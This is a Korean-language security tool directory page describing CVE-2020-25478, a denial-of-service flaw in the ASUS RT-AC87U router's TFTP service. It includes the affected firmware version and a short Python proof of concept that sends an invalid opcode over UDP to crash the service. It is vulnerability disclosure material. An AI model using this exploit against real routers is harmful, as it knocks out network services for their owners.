Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack — ASUS RT-AC87U TFTP is vulnerable to Denial of Service(DoS) attack | Kitploit
도구/GitHubGitHub/santokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack
Vulnerability AnalysisExploitationFuzzingHardware & IoT Security
GitHubsantokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack

CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack

ASUS RT-AC87U TFTP is vulnerable to Denial of Service(DoS) attack

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
3년 전아직 검토되지 않음

ASUS-RT-AC87U-TFTP-서비스-거부(DoS)-공격에-취약함

CVE-2020-25478 - ASUS RT-AC87U TFTP는 서비스 거부(DoS) 공격에 취약합니다

  1. 영향을 받는 제품 및 버전

ASUS RT-AC87U 3.0.0.4.382_51640

  1. 문제 유형

주로 CWE-20과 관련이 있으며, ASUS RT-AC87U에서 실행되는 TFTP 서비스는 잘못된 opcode가 전송될 때 서비스 거부(DoS) 공격에 취약합니다. 다음 파이썬 코드 스니펫은 취약점 테스트에 사용됩니다:

root@kitploit:~
	import socket
	import sys
	tftpd = ('192.168.1.1', 69)
	#Try and open an UDP SOCKET
	try:
	tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	except:
	print("Failed on socket creation, so exiting")
	sys.exit(1)
	#create a invalid opcode exeeding the 2 byte length
	# opcode operation
	# 1 Read request (RRQ)
	# 2 Write request (WRQ)
	# 3 Data (DATA)
	# 4 Acknowledgment (ACK)
	# 5 Error (ERROR)
	invalidOpcode = "0000"
	tftp.sendto(invalidOpcode,tftpd)

3. 설명

ASUS RT-AC87U 버전 3.0.0.4.382_51640은 TFTP 서비스에 대한 서비스 거부 공격에 취약하여 TFTP 서비스가 중단됩니다. TFTP 서비스는 잘못된 opcode를 전송하여 원격으로 중단될 수 있습니다.

https://www.asus.com/content/ASUS-Product-Security-Advisory/

도구 다운로드